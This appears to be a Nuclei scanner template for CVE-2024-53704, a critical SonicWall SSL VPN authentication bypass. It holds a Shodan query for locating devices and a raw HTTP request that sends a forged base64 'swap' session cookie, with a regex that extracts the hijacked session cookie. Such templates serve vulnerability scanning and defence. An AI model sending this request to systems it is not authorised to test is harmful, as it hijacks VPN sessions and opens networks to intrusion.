漏洞描述
An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
id: CVE-2024-53704
info:
name: SSL VPN Session Hijacking
author: johnk3r
severity: critical
description: |
An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.
reference:
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-53704
cwe-id: CWE-287
epss-score: 0.93819
epss-percentile: 0.9986
metadata:
verified: true
max-request: 1
shodan-query: "http.html_hash:-1466805544"
tags: cve,cve2024,sonicwall,kev,vkev
http:
- raw:
- |
GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1
Host: {{Hostname}}
Cookie: swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "NELaunchX1"
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- 'Set-Cookie: swap=([a-zA-Z0-9]+);'
# digest: 490a0046304402203197025b2ff385f09caedb6581fa1865498bf8a7542caaada21e4510143b554c02203d4087ac569c6254581f8247750c0aa1032454f9bae57591bb76d9a56cd7884c:922c64590222798bb761d5b6d8e72950